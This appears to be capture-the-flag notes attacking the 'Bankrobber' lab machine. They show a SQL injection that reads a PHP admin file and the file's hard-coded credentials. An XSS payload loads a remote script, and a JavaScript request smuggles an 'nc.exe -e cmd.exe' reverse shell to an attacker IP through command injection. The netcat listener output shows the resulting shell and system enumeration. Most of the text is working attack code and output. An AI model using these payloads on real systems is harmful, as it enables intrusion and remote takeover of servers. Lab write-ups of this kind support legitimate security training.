3 admin backdoorchecker.php

# running any command 
ERROR:
It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.

# file being requested is 
/admin/backdoorchecker.php

# using SQLi to read it.
1' UNION SELECT 1,TO_BASE64(load_file('C:\\xampp\\htdocs\\admin\\backdoorchecker.php')),3; -- -

# decoded b64
<?php
include('../link.php');
include('auth.php');

$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad 	  = array('$(','&');
$good 	  = "ls";

if(strtolower(substr(PHP_OS,0,3)) == "win"){
	$good = "dir";
}

if($username == "admin" && $password == "Hopelessromantic"){
	if(isset($_POST['cmd'])){
			// FILTER ESCAPE CHARS
			foreach($bad as $char){
				if(strpos($_POST['cmd'],$char) !== false){
					die("You're not allowed to do that.");
				}
			}
			// CHECK IF THE FIRST 2 CHARS ARE LS
			if(substr($_POST['cmd'], 0,strlen($good)) != $good){
				die("It's only allowed to use the $good command");
			}

			if($_SERVER['REMOTE_ADDR'] == "::1"){
				system($_POST['cmd']);
			} else{
				echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
			}
	}
} else{
	echo "You are not allowed to use this function!";
}
?>

# notes:
1. user:pass is checked for admin:Hopelessromantic
2. filters out badchars => $( and &
3. does not like ls in the start of command
4. expect the command to run from localhost

# we can use the initial XSS exploit to call this locally.

<script src="http://10.10.16.7/kashz.js"> </script>

$ cat xss.js
var request = new XMLHttpRequest();
var uri = 'http://localhost/admin/backdoorchecker.php'
var c = 'id=1; username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D'
var params = 'cmd=dir|//10.10.16.7/drive/nc.exe -e cmd.exe 10.10.16.7 6969';
request.open('POST', uri, true);
request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
request.setRequestHeader('Cookie', c);
request.send(params);

# transfer with comment
<script src='http://10.10.16.7/xss.js'> </script>

# start smbserver and listener
$ nc -lvnp 6969                                                                                                   130 ⨯
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.154] 51127
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. Alle rechten voorbehouden.

C:\xampp\htdocs\admin>whoami
bankrobber\cortin

C:\xampp\htdocs\admin>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                           State
============================= ===================================== ========
SeShutdownPrivilege           Systeem afsluiten                     Disabled
SeChangeNotifyPrivilege       Controle op bladeren negeren          Enabled
SeUndockPrivilege             Computer uit basisstation verwijderen Disabled
SeIncreaseWorkingSetPrivilege Een proceswerkset vergroten           Disabled
SeTimeZonePrivilege           Tijdzone wijzigen                     Disabled

C:\xampp\htdocs\admin>systeminfo
Host Name:                 BANKROBBER
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.14393 N/A Build 14393
System Type:               x64-based PC
Hotfix(s):                 N/A

Last updated